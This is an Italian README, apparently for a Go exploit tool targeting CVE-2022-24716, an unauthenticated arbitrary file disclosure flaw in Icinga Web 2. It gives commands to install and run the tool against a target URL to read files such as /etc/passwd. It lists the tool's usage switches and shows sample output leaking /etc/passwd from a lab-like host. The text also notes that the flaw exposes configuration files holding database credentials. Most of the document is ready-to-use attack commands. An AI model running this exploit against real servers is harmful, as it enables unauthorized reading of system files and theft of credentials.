
CVE-2022-24716 (Divulgazione arbitraria di file Icingaweb2)
Icinga Web 2 è un'interfaccia web di monitoraggio open source, un framework e un'interfaccia a riga di comando. Gli utenti non autenticati possono divulgare il contenuto di file di sistema locali accessibili dall'utente dal server web, inclusi i file di configurazione di icingaweb2 con le credenziali del database.
CVE-2022-24716 richiede golang e per scaricarlo basta usare:
go install -v github.com/joaoviictorti/CVE-2022-24716@latest
go run .\CVE-2022-24716.go -u http://localhost -f /etc/passwd
go run .\CVE-2022-24716.go -u http://localhost -f /etc/passwd -p http://127.0.0.1:8080
Questo mostrerà l'aiuto per lo strumento. Ecco tutti gli switch supportati:
usage: CVE-2022-24716 [-h|--help] -u|--url "<value>" -f|--file "<value>"
[-p|--proxy "<value>"]
CVE-2022-24716 - Arbitrary File Disclosure
Arguments:
-h --help Print help information
-u --url Insert url
-f --file Insert file
-p --proxy Insert proxy
go run .\CVE-2022-24716.go -u http://icinga.cerberus.local:8080 -f /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
......